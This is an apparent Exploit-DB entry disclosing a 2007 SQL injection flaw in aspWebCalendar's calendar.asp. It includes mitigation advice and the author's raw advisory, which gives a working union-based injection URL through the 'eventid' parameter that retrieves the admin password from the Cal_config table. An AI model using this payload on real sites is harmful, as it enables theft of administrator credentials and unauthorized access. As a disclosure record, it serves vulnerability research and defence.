aspWebCalendar Remote SQL Injection Vulnerability

vendor:

aspWebCalendar

by:

parad0x

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: aspWebCalendar

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

aspWebCalendar Remote SQL Injection Vulnerability

This vulnerability allows an attacker to perform SQL injection by manipulating the 'eventid' parameter in the 'calendar.asp' page. The example exploit provided demonstrates the use of a union-based SQL injection technique to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs before using them in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  aspWebCalendar Remote SQL Injection Vulnerability
# Author  :  parad0x
# Contact :  :(
# D.Page  :  http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$      :  free
#S.Page : http://fullrevolution.com
*******************************************************************************
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]

Example:

/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config

"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron

"""""""""""""""""""""
www.p4r4d0x.com

# milw0rm.com [2007-03-22]